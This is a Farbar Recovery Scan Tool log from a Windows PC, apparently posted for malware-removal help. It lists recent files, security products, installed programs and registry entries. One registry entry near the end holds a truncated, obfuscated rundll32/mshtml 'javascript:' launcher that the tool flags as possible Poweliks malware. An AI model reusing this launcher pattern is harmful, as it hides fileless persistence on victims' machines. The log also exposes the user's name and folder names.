    2015-01-04 09:04 - 2013-05-10 10:44 - 00000926 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
    2015-01-04 09:02 - 2013-05-01 19:34 - 00000000 ____D () C:\Users\NorMac\AppData\Local\CrashDumps
    2015-01-04 09:00 - 2012-07-26 03:12 - 00000000 ____D () C:\WINDOWS\system32\sru
    2015-01-04 08:32 - 2012-07-26 02:28 - 00852298 _____ () C:\WINDOWS\system32\PerfStringBackup.INI
    2015-01-04 08:29 - 2013-02-28 12:24 - 00000000 ____D () C:\Program Files\SUPERAntiSpyware
    2015-01-03 23:28 - 2014-07-26 10:58 - 00000588 _____ () C:\WINDOWS\Tasks\G2MUpdateTask-S-1-5-21-485173556-832918840-2370493585-1000.job
    2015-01-03 22:34 - 2012-12-19 04:36 - 00003594 _____ () C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-485173556-832918840-2370493585-1000
    2015-01-03 22:32 - 2014-06-10 12:45 - 00004182 _____ () C:\WINDOWS\System32\Tasks\avast! Emergency Update
    2015-01-03 22:30 - 2013-05-10 10:44 - 00000922 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
    2015-01-03 22:29 - 2012-07-26 02:22 - 00000006 ____H () C:\WINDOWS\Tasks\SA.DAT
    2015-01-02 09:03 - 2013-09-14 10:47 - 00000000 ____D () C:\Users\NorMac\AppData\Roaming\mjusbsp
    2015-01-02 09:03 - 2013-09-14 10:39 - 00000985 _____ () C:\Users\NorMac\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\magicJack.lnk
    2015-01-01 20:36 - 2012-12-19 04:11 - 00000000 ____D () C:\Users\NorMac
    2015-01-01 20:28 - 2014-10-06 20:30 - 00000000 ____D () C:\Program Files (x86)\CyberLink
    2015-01-01 20:28 - 2014-10-06 20:21 - 00000000 ____D () C:\ProgramData\SUPPORTDIR
    2015-01-01 20:28 - 2013-02-11 18:34 - 00000000 ___HD () C:\Program Files (x86)\InstallShield Installation Information
    2015-01-01 20:21 - 2013-08-07 19:49 - 00000000 ____D () C:\ProgramData\Apple
    2015-01-01 13:22 - 2013-02-04 18:35 - 01111552 ___SH () C:\Users\NorMac\Downloads\Thumbs.db
    2014-12-31 22:28 - 2013-04-28 12:58 - 00000000 ____D () C:\Users\NorMac\Desktop\4-X-13 TO DO FOLDER
    2014-12-31 22:19 - 2013-01-14 19:42 - 00000000 ____D () C:\ProgramData\Western Digital
    2014-12-31 22:13 - 2013-09-09 14:54 - 00000000 ____D () C:\Users\NorMac\AppData\Roaming\Audacity
    2014-12-30 18:39 - 2012-12-20 01:00 - 02285056 ___SH () C:\Users\NorMac\Desktop\Thumbs.db
    2014-12-30 18:26 - 2014-10-23 11:43 - 00000000 ____D () C:\Users\NorMac\Downloads\Ansonia-Milford JD Directions - CT Judicial Branch_files
    2014-12-30 17:20 - 2012-11-09 13:01 - 00000000 ____D () C:\Users\NorMac\Documents\9-Sony IC recorder files
    2014-12-28 20:15 - 2012-12-19 04:11 - 06815744 ___SH () C:\Users\NorMac\.ghost-ntfs-3g-00000000000000000013
    2014-12-28 20:15 - 2012-07-26 00:26 - 95944704 _____ () C:\WINDOWS\system32\config\.ghost-ntfs-3g-00000000000000000001
    2014-12-28 20:15 - 2012-07-26 00:26 - 34603008 _____ () C:\WINDOWS\system32\config\.ghost-ntfs-3g-00000000000000000003
    2014-12-26 13:55 - 2012-07-26 02:59 - 00000000 ____D () C:\WINDOWS\CbsTemp
    2014-12-25 17:36 - 2014-10-14 16:30 - 00000000 ____D () C:\Users\NorMac\AppData\Roaming\vlc
    2014-12-25 15:35 - 2013-07-10 15:32 - 00000884 __RSH () C:\Users\NorMac\ntuser.pol
    2014-12-25 15:27 - 2012-07-26 03:12 - 00000000 ___RD () C:\WINDOWS\ToastData
    2014-12-25 15:27 - 2012-07-26 03:12 - 00000000 ___RD () C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools
    2014-12-25 15:27 - 2012-07-26 03:12 - 00000000 ___RD () C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools
    2014-12-25 15:27 - 2012-07-26 03:12 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories
    2014-12-25 15:27 - 2012-07-26 03:12 - 00000000 ____D () C:\Program Files\Windows Defender
    2014-12-25 15:27 - 2012-07-26 03:12 - 00000000 ____D () C:\Program Files (x86)\Windows Defender
    2014-12-25 15:22 - 2012-12-20 00:30 - 00000000 ____D () C:\ProgramData\Microsoft Help
    2014-12-24 16:34 - 2014-02-06 22:11 - 2011317248 _____ () C:\Users\NorMac\Documents\Outlook-12345.pst
    2014-12-24 16:19 - 2014-07-26 10:58 - 00003592 _____ () C:\WINDOWS\System32\Tasks\G2MUpdateTask-S-1-5-21-485173556-832918840-2370493585-1000
    2014-12-22 19:09 - 2014-11-10 18:51 - 00000000 ____D () C:\Users\NorMac\AppData\Roaming\EssentialPIM
    2014-12-22 18:44 - 2013-06-07 12:20 - 00000000 ____D () C:\Users\NorMac\Desktop\Sutton Place Properties LLC
    2014-12-21 20:46 - 2012-12-19 17:58 - 00000000 ____D () C:\Users\NorMac\AppData\Local\CutePDF Writer
    2014-12-20 22:05 - 2012-12-20 00:42 - 00000000 ____D () C:\Users\NorMac\AppData\Local\HP
    2014-12-20 15:15 - 2014-02-11 23:54 - 00000000 ____D () C:\Users\NorMac\AppData\Local\NETGEARGenie
    2014-12-20 15:10 - 2012-07-26 00:26 - 00262144 ___SH () C:\WINDOWS\system32\config\BBI
    2014-12-20 10:58 - 2014-06-10 12:45 - 01050432 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswsnx.sys
    2014-12-20 10:57 - 2014-06-10 12:45 - 00436624 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswsp.sys
    2014-12-20 10:57 - 2014-06-10 12:45 - 00267632 _____ () C:\WINDOWS\system32\Drivers\aswVmm.sys
    2014-12-20 10:57 - 2014-06-10 12:45 - 00116728 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswstm.sys
    2014-12-20 10:57 - 2014-06-10 12:45 - 00093568 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswRdr2.sys
    2014-12-20 10:57 - 2014-06-10 12:45 - 00083280 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswMonFlt.sys
    2014-12-20 10:57 - 2014-06-10 12:45 - 00065776 _____ () C:\WINDOWS\system32\Drivers\aswRvrt.sys
    2014-12-20 10:57 - 2014-06-10 12:45 - 00029208 _____ () C:\WINDOWS\system32\Drivers\aswHwid.sys
    2014-12-20 08:12 - 2012-07-26 00:26 - 00262144 ___SH () C:\WINDOWS\system32\config\ELAM
    2014-12-16 20:45 - 2012-12-27 18:49 - 00000000 ____D () C:\WINDOWS\Minidump
    2014-12-16 00:56 - 2013-03-01 08:59 - 00030208 _____ () C:\Users\NorMac\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
    2014-12-14 14:33 - 2012-12-19 18:06 - 00000000 ____D () C:\Users\NorMac\AppData\Local\Adobe
    2014-12-14 10:28 - 2013-02-06 17:44 - 00545792 ___SH () C:\Users\NorMac\Documents\Thumbs.db
    2014-12-12 23:14 - 2013-05-10 10:45 - 00002187 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
    2014-12-12 08:45 - 2012-12-19 04:38 - 00000000 ____D () C:\Program Files (x86)\Mozilla Maintenance Service
    2014-12-09 08:36 - 2012-07-26 03:12 - 00000000 ____D () C:\WINDOWS\AUInstallAgent
    2014-12-07 17:18 - 2014-12-02 21:11 - 00000000 ____D () C:\Program Files (x86)\Mozilla Thunderbird
    2014-12-07 12:50 - 2013-11-20 00:13 - 00001083 _____ () C:\Users\NorMac\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Search.lnk
    2014-12-06 23:35 - 2014-04-08 17:40 - 00135384 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
    2014-12-06 09:56 - 2012-12-20 00:49 - 00000000 ____D () C:\ProgramData\HP
    2014-12-06 09:56 - 2012-12-20 00:49 - 00000000 ____D () C:\Program Files (x86)\HP
    2014-12-06 09:40 - 2012-12-20 00:50 - 00000000 ____D () C:\Users\NorMac\AppData\Roaming\HpUpdate
    2014-12-06 09:35 - 2014-09-25 12:03 - 00000000 ____D () C:\Program Files (x86)\Hewlett-Packard
    2014-12-06 09:34 - 2012-12-20 00:50 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HP
    2014-12-06 09:30 - 2012-12-20 00:49 - 00000000 ____D () C:\Program Files\HP

    ==================== Bamital & volsnap Check =================

    (There is no automatic fix for files that do not pass verification.)

    C:\Windows\System32\winlogon.exe => File is digitally signed
    C:\Windows\System32\wininit.exe => File is digitally signed
    C:\Windows\explorer.exe => File is digitally signed
    C:\Windows\SysWOW64\explorer.exe => File is digitally signed
    C:\Windows\System32\svchost.exe => File is digitally signed
    C:\Windows\SysWOW64\svchost.exe => File is digitally signed
    C:\Windows\System32\services.exe => File is digitally signed
    C:\Windows\System32\User32.dll => File is digitally signed
    C:\Windows\SysWOW64\User32.dll => File is digitally signed
    C:\Windows\System32\userinit.exe => File is digitally signed
    C:\Windows\SysWOW64\userinit.exe => File is digitally signed
    C:\Windows\System32\rpcss.dll => File is digitally signed
    C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed


    LastRegBack: 2015-01-03 03:01

    ==================== End Of Log ============================

    //////////////// (2) ADDITION.TXT REPORT

    Additional scan result of Farbar Recovery Scan Tool (x64) Version: 03-01-2015 03
    Ran by NorMac at 2015-01-04 09:11:36
    Running from C:\Users\NorMac\Downloads
    Boot Mode: Normal
    ==========================================================


    ==================== Security Center ========================

    (If an entry is included in the fixlist, it will be removed.)

    AV: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
    AV: avast! Antivirus (Enabled - Up to date) {17AD7D40-BA12-9C46-7131-94903A54AD8B}
    AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
    AS: Spybot - Search and Destroy (Enabled - Out of date) {9BC38DF1-3CCA-732D-A930-C1CA5F20A4B0}
    AS: avast! Antivirus (Enabled - Up to date) {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}

    ==================== Installed Programs ======================

    (Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

    64 Bit HP CIO Components Installer (Version: 7.2.8 - Hewlett-Packard) Hidden
    6400_Help (x32 Version: 1.00.0000 - Hewlett-Packard) Hidden
    8GadgetPack (HKLM-x32\...\{DE18940E-5986-480A-8518-7327D14756D3}) (Version: 6.0.0 - Helmut Buhler)
    Adobe Flash Player 16 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 16.0.0.235 - Adobe Systems Incorporated)
    Adobe Reader XI (11.0.03) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.03 - Adobe Systems Incorporated)
    Adobe Shockwave Player 12.0 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.0.2.122 - Adobe Systems, Inc.)
    Ashampoo Burning Studio 2013 v.11.0.6 (HKLM-x32\...\{91B33C97-0FBA-74AE-E802-D782F5C8AA89}_is1) (Version: 11.0.6 - Ashampoo GmbH & Co. KG)
    Ask Toolbar (HKLM-x32\...\{41525333-0076-A76A-76A7-A758B70B0A00}) (Version: 11.10.0.748 - Ask Partner Network) <==== ATTENTION
    Audacity 2.0.4 (HKLM-x32\...\Audacity_is1) (Version: 2.0.4 - Audacity Team)
    Avast Free Antivirus (HKLM-x32\...\Avast) (Version: 10.0.2208 - AVAST Software)
    AVS Video Converter 8 (HKLM-x32\...\AVS4YOU Video Converter 7_is1) (Version: 8.3.3.535 - Online Media Technologies Ltd.)
    Bing Bar (HKLM-x32\...\{3365E735-48A6-4194-9988-CE59AC5AE503}) (Version: 7.3.132.0 - Microsoft Corporation)
    bpd_scan (x32 Version: 3.00.0000 - Hewlett-Packard) Hidden
    BPDSoftware (x32 Version: 140.0.001.000 - Hewlett-Packard) Hidden
    BPDSoftware_Ini (x32 Version: 1.00.0000 - Hewlett-Packard) Hidden
    BufferChm (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden
    Camtasia Studio 8 (HKLM-x32\...\{DB93E2C2-851F-44B2-B09C-351D2C624AE1}) (Version: 8.0.4.1060 - TechSmith Corporation)
    CCleaner (HKLM\...\CCleaner) (Version: 5.01 - Piriform)
    Citrix Online Launcher (HKLM-x32\...\{C57F6C71-C365-4AFF-9108-397BBAD6127F}) (Version: 1.0.204 - Citrix)
    Cradle of Rome (HKLM-x32\...\exent_554750) (Version: - )
    CutePDF Writer 3.0 (HKLM\...\CutePDF Writer Installation) (Version: 3.0 - CutePDF.com)
    Destinations (x32 Version: 140.0.253.000 - Hewlett-Packard) Hidden
    DeviceDiscovery (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden
    Digital Voice Editor 3 (HKLM-x32\...\{6CCC133E-9A2F-4CAA-8866-75D029CD3AB3}) (Version: 3.3.01.11240 - Sony Corporation)
    DocProc (x32 Version: 140.0.185.000 - Hewlett-Packard) Hidden
    Dropbox (HKU\S-1-5-21-485173556-832918840-2370493585-1000\...\Dropbox) (Version: 2.6.24 - Dropbox, Inc.)
    eFax Messenger (HKLM-x32\...\{DF6DA606-904D-4C18-823F-A4CFC3035E53}) (Version: 4.4.2.533 - j2 Global)
    EPIM-Outlook Sync (HKLM-x32\...\EPIM-Outlook Sync) (Version: 6.0 - Astonsoft Ltd)
    EssentialPIM (HKLM-x32\...\EssentialPIM) (Version: 6.02 - Astonsoft Ltd)
    EssentialPIM Pro (HKLM-x32\...\EssentialPIM Pro) (Version: 6.03 - Astonsoft Ltd)
    Fax (x32 Version: 140.0.307.000 - Hewlett-Packard) Hidden
    FileZilla Client 3.6.0.2 (HKLM-x32\...\FileZilla Client) (Version: 3.6.0.2 - FileZilla Project)
    Google Chrome (HKLM-x32\...\Google Chrome) (Version: 39.0.2171.95 - Google Inc.)
    Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
    Google+ Auto Backup (HKLM-x32\...\{A50DE037-B5C0-4C8A-8049-B0C576B313D1}) (Version: 1.0.21.81 - Google)
    GoToMeeting 7.0.5.2130 (HKU\S-1-5-21-485173556-832918840-2370493585-1000\...\GoToMeeting) (Version: 7.0.5.2130 - CitrixOnline)
    GPBaseService2 (x32 Version: 140.0.297.000 - Hewlett-Packard) Hidden
    Heroes of Hellas (HKLM-x32\...\exent_532150) (Version: - )
    HMA! Pro VPN 2.8.1.10 (HKLM-x32\...\HMA! Pro VPN) (Version: 2.8.1.10 - )
    HP Customer Participation Program 14.0 (HKLM\...\HPExtendedCapabilities) (Version: 14.0 - HP)
    HP Imaging Device Functions 14.0 (HKLM\...\HP Imaging Device Functions) (Version: 14.0 - HP)
    HP OfficeJet J6400 14.0 Rel. 6 (HKLM\...\{4B4B81D9-3C2C-4388-A281-40F3299B911E}) (Version: 14.0 - HP)
    HP Officejet Pro 8600 Basic Device Software (HKLM\...\{791A06E2-340F-43B0-8FAB-62D151339362}) (Version: 28.0.1315.0 - Hewlett-Packard Co.)
    HP Officejet Pro 8600 Help (HKLM-x32\...\{46235FF7-2CBE-4A84-BEDA-87348D1F7850}) (Version: 28.0.0 - Hewlett Packard)
    HP Officejet Pro 8610 Basic Device Software (HKLM\...\{DAE3B13B-5097-4EAE-BC26-C463377BD80E}) (Version: 32.2.188.47710 - Hewlett-Packard Co.)
    HP Officejet Pro 8610 Help (HKLM-x32\...\{F9569D00-4576-46C8-B6C7-207A4FD39745}) (Version: 32.0.0 - Hewlett Packard)
    HP Solution Center 14.0 (HKLM\...\HP Solution Center & Imaging Support Tools) (Version: 14.0 - HP)
    HP Support Solutions Framework (HKLM-x32\...\{44157EB3-D8D0-4BB1-B0F5-AD2C38814ED1}) (Version: 11.51.0027 - Hewlett-Packard Company)
    HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)
    HPDiagnosticAlert (x32 Version: 1.00.0000 - Microsoft) Hidden
    HPProductAssistant (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden
    HPSSupply (x32 Version: 140.0.297.000 - Hewlett-Packard) Hidden
    I.R.I.S. OCR (HKLM-x32\...\{CA6BCA2F-EDEB-408F-850B-31404BE16A61}) (Version: 12.3.4.0 - HP)
    iTunes (HKLM\...\{B8BA155B-1E75-405F-9CB4-8A99615D09DC}) (Version: 11.1.5.5 - Apple Inc.)
    J6400 (x32 Version: 140.0.001.000 - Hewlett-Packard) Hidden
    Java 7 Update 71 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F03217071FF}) (Version: 7.0.710 - Oracle)
    LTCM Client (HKLM-x32\...\{B38E9B55-7136-4E66-A084-320512FF3F6F}) (Version: 1.20.3792 - Leader Technologies Inc)
    magicJack (HKU\S-1-5-21-485173556-832918840-2370493585-1000\...\magicJack) (Version: 4.1.7574.5297 - magicJack L.P.)
    Malwarebytes' Anti-Malware (HKLM-x32\...\Malwarebytes' Anti-Malware_is1) (Version: - Malwarebytes Corporation)
    MarketResearch (x32 Version: 140.0.212.000 - Hewlett-Packard) Hidden
    McAfee Security Scan Plus (HKLM\...\McAfee Security Scan) (Version: 3.8.150.1 - McAfee, Inc.)
    Media Player Classic - Home Cinema v1.5.2.3456 (HKLM-x32\...\{2624B969-7135-4EB1-B0F6-2D8C397B45F7}_is1) (Version: 1.5.2.3456 - MPC-HC Team)
    Microsoft Office 2007 Primary Interop Assemblies (HKLM-x32\...\{50120000-1105-0000-0000-0000000FF1CE}) (Version: 12.0.4518.1014 - Microsoft Corporation)
    Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISE) (Version: 12.0.4518.1014 - Microsoft Corporation)
    Microsoft Office Project Professional 2007 (HKLM-x32\...\PRJPRO) (Version: 12.0.4518.1014 - Microsoft Corporation)
    Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 1.0.0.0 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
    Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
    Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
    Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
    Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
    Mozilla Firefox 34.0.5 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 34.0.5 (x86 en-US)) (Version: 34.0.5 - Mozilla)
    Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 31.0 - Mozilla)
    Mozilla Thunderbird 31.3.0 (x86 en-US) (HKLM-x32\...\Mozilla Thunderbird 31.3.0 (x86 en-US)) (Version: 31.3.0 - Mozilla)
    mPlayer version 1.0 (HKLM-x32\...\{B482E758-D602-434C-80B9-DDEFEEAE4BCA}_is1) (Version: 1.0 - Download Freely, LLC)
    MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation)
    Nero BurnLite 10 (HKLM-x32\...\{842BEE12-CCCB-43F4-ABAF-CBA6DFE2583D}) (Version: 10.0.10600 - Nero AG)
    Nero BurnLite 10 (HKLM-x32\...\{AB627AF2-9C7E-4DBD-816B-3B2646B81E89}) (Version: 10.0.10500.5.100 - Nero AG)
    Nero Update (HKLM-x32\...\{65BB0407-4CC8-4DC7-952E-3EEFDF05602A}) (Version: 1.0.0018 - Nero AG)
    NETGEAR Genie (HKLM-x32\...\NETGEAR Genie) (Version: 2.3.1.16 - NETGEAR Inc.)
    Network64 (Version: 140.0.306.000 - Hewlett-Packard) Hidden
    OCR Software by I.R.I.S. 14.0 (HKLM\...\HPOCR) (Version: 14.0 - HP)
    Picasa 3 (HKLM-x32\...\Picasa 3) (Version: 3.9 - Google, Inc.)
    Product Improvement Study for HP Officejet Pro 8610 (HKLM\...\{710F7B0F-A679-4314-8E69-E868B660FAEA}) (Version: 32.2.188.47710 - Hewlett-Packard Co.)
    ProductContext (x32 Version: 140.0.001.000 - Hewlett-Packard) Hidden
    QuickBooks Pro 2009 (HKLM-x32\...\{9A2F0810-3622-4E86-9072-973FBE1679C5}) (Version: 19.0.4001.703 - Intuit Inc.)
    RealDownloader (x32 Version: 1.3.3 - RealNetworks, Inc.) Hidden
    RealNetworks - Microsoft Visual C++ 2008 Runtime (x32 Version: 9.0 - RealNetworks, Inc) Hidden
    RealNetworks - Microsoft Visual C++ 2010 Runtime (x32 Version: 10.0 - RealNetworks, Inc) Hidden
    RealUpgrade 1.1 (x32 Version: 1.1.0 - RealNetworks, Inc.) Hidden
    Recuva (HKLM\...\Recuva) (Version: 1.51 - Piriform)
    Scan (x32 Version: 140.0.253.000 - Hewlett-Packard) Hidden
    Shop for HP Supplies (HKLM\...\Shop for HP Supplies) (Version: 14.0 - HP)
    SolutionCenter (x32 Version: 140.0.299.000 - Hewlett-Packard) Hidden
    Sophos Virus Removal Tool (HKLM-x32\...\{B829E117-D072-41EA-9606-9826A38D34C1}) (Version: 2.5.4 - Sophos Limited)
    Spybot - Search & Destroy (HKLM-x32\...\{B4092C6D-E886-4CB2-BA68-FE5A99D31DE7}_is1) (Version: 2.3.39 - Safer-Networking Ltd.)
    Stardock Start8 (HKLM-x32\...\Stardock Start8) (Version: 1.20 - Stardock Software, Inc.)
    Status (x32 Version: 140.0.342.000 - Hewlett-Packard) Hidden
    SUPERAntiSpyware (HKLM\...\{CDDCBBF1-2703-46BC-938B-BCC81A1EEAAA}) (Version: 5.6.1010 - SUPERAntiSpyware.com)
    SupportSoft Assisted Service (HKLM-x32\...\{5A3F6A80-7913-475E-8B96-477A952CFA43}) (Version: 15 - SupportSoft)
    swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
    TaxACT 2006 (HKLM-x32\...\TaxACT 2006) (Version: - 2nd Story Software, Inc.)
    TaxACT 2007 (HKLM-x32\...\TaxACT 2007) (Version: - 2nd Story Software, Inc.)
    TaxACT 2008 (HKLM-x32\...\TaxACT 2008) (Version: - 2nd Story Software, Inc.)
    TaxACT 2010 (HKLM-x32\...\TaxACT 2010) (Version: - 2nd Story Software, Inc.)
    TaxACT 2010 New York (HKLM-x32\...\TaxACT 2010 New York) (Version: - 2nd Story Software, Inc.)
    TaxACT 2012 - 1040 Edition (HKLM-x32\...\TaxACT 2012 - 1040 Edition) (Version: - 2nd Story Software, Inc.)
    TaxACT 2012 - 1120 Edition (HKLM-x32\...\TaxACT 2012 - 1120 Edition) (Version: - 2nd Story Software, Inc.)
    TaxACT 2012 New York - 1120 Edition (HKLM-x32\...\TaxACT 2012 New York - 1120 Edition) (Version: - 2nd Story Software, Inc.)
    TaxACT 2012 New York (HKLM-x32\...\TaxACT 2012 New York) (Version: - 2nd Story Software, Inc.)
    TaxACT 2013 - 1040 Edition (HKLM-x32\...\TaxACT 2013 - 1040 Edition) (Version: - TaxACT, Inc.)
    TaxACT 2013 - 1120 Edition (HKLM-x32\...\TaxACT 2013 - 1120 Edition) (Version: - TaxACT, Inc.)
    TaxACT 2013 New York - 1120 Edition (HKLM-x32\...\TaxACT 2013 New York - 1120 Edition) (Version: - TaxACT, Inc.)
    TaxACT 2013 New York (HKLM-x32\...\TaxACT 2013 New York) (Version: - TaxACT, Inc.)
    Time Riddles: The Mansion (HKLM-x32\...\exent_683150) (Version: - )
    Toolbox (x32 Version: 140.0.596.000 - Hewlett-Packard) Hidden
    TrayApp (x32 Version: 140.0.297.000 - Hewlett-Packard) Hidden
    TurboTax 2009 (HKLM-x32\...\TurboTax 2009) (Version: - Intuit, Inc)
    TurboTax Business 2010 (HKLM-x32\...\TurboTax Business 2010) (Version: - Intuit, Inc)
    Unity Web Player (HKU\S-1-5-21-485173556-832918840-2370493585-1000\...\UnityWebPlayer) (Version: - Unity Technologies ApS)
    Visual Studio 2005 Tools for Office Second Edition Runtime (HKLM-x32\...\Microsoft Visual Studio 2005 Tools for Office Runtime) (Version: - Microsoft Corporation)
    VLC media player (HKLM-x32\...\VLC media player) (Version: 2.1.5 - VideoLAN)
    WD SmartWare (HKLM\...\{07179D37-D5FE-4373-90D9-A25B992EFB3E}) (Version: 1.4.5.5 - Western Digital)
    WD SmartWare (HKLM\...\{9798BB87-01B9-4D46-8EA0-6681E72BDE87}) (Version: 1.6.5.2 - Western Digital Technologies, Inc.)
    WebReg (x32 Version: 140.0.297.017 - Hewlett-Packard) Hidden
    WinRAR 4.20 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 4.20.0 - win.rar GmbH)
    WinZip Courier (HKLM-x32\...\{CD95F661-A5C4-11AF-B2CC-ABCD21A325BC}) (Version: 4.5.10424 - WinZip Computing, S.L. )
    Wondershare DVD Creator(Build 2.6.5) (HKLM-x32\...\Wondershare DVD Creator_is1) (Version: - Wondershare)
    XMind 2012 (v3.3.1) (HKLM-x32\...\XMind_is1) (Version: 3.3.1.201212250029 - XMind Ltd.)
    Your Software Deals 1.0.0 (HKLM-x32\...\Your Software Deals_is1) (Version: 1.0.0 - Ashampoo GmbH & Co. KG)
    Youtube Downloader HD v. 2.9.9.14 (HKLM-x32\...\Youtube Downloader HD_is1) (Version: - YoutubeDownloaderHD.com)
    Zimbra Desktop (HKLM-x32\...\{B88E669F-9435-4677-A308-2D2690301754}) (Version: 7.2.5.12038 - Zimbra)

    ==================== Custom CLSID (selected items): ==========================

    (If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

    CustomCLSID: HKU\S-1-5-21-485173556-832918840-2370493585-1000_Classes\CLSID\{083f5ae0-2b0a-11dd-bd0b-0800200c9a66}\InprocServer32 -> C:\WINDOWS\system32\mscoree.dll (Microsoft Corporation)
    CustomCLSID: HKU\S-1-5-21-485173556-832918840-2370493585-1000_Classes\CLSID\{0E7BE950-4ACC-47CB-834B-41A8B96BBFF9}\InprocServer32 -> C:\Users\NorMac\AppData\Local\Microsoft\Windows Sidebar\Gadgets\Sidebar7.gadget\Release\Sidebar7.64.dll (Helmut Buhler)
    CustomCLSID: HKU\S-1-5-21-485173556-832918840-2370493585-1000_Classes\CLSID\{3560575F-7C2D-48AE-AB45-DAD430A95EBE}\InprocServer32 -> C:\Program Files (x86)\WinZip Courier\adxloader64.dll ()
    CustomCLSID: HKU\S-1-5-21-485173556-832918840-2370493585-1000_Classes\CLSID\{84B5A313-CD5D-4904-8BA2-AFDC81C1B309}\InprocServer32 -> C:\Users\NorMac\AppData\Local\Citrix\GoToMeeting\1440\G2MOutlookAddin64.dll (Citrix Online, a division of Citrix Systems, Inc.)
    CustomCLSID: HKU\S-1-5-21-485173556-832918840-2370493585-1000_Classes\CLSID\{943F19B2-32F9-4373-8D4C-DBE62B95F2CF}\InprocServer32 -> C:\Program Files (x86)\WinZip Courier\adxloader64.dll ()
    CustomCLSID: HKU\S-1-5-21-485173556-832918840-2370493585-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 251 more characters). <==== Poweliks?
    CustomCLSID: HKU\S-1-5-21-485173556-832918840-2370493585-1000_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\NorMac\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll (Dropbox, Inc.)
    CustomCLSID: HKU\S-1-5-21-485173556-832918840-2370493585-1000_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\NorMac\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll (Dropbox, Inc.)
